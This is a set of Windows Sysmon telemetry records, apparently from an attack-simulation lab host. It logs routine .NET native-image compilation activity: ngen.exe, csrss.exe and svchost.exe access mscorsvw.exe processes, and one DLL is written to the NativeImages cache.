{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8907,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.107\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D2D41000}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.107","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D2D41000}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8908,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.107\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D2D41000}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.107","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D2D41000}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8909,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.123\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D2D41000}\r\nTargetProcessId: 4528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.123","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D2D41000}","TargetProcessId":"4528","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8910,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:01.451\r\nProcessGuid: {E2A3D6B1-13A5-5F25-0000-0010D2D41000}\r\nProcessId: 4528\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\UIAutomationClient.dll\r\nCreationUtcTime: 2020-08-01 07:03:01.451","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:01.451","ProcessGuid":"{E2A3D6B1-13A5-5F25-0000-0010D2D41000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b0-0\\UIAutomationClient.dll","CreationUtcTime":"2020-08-01 07:03:01.451","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.498\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D3D81000}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.498","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D3D81000}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.498\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D3D81000}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.498","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D3D81000}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.498\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-0010D3D81000}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.498","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-0010D3D81000}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.591\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.591","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:01.591\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1372-5F25-0000-00102CE10E00}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:01.591","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1372-5F25-0000-00102CE10E00}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
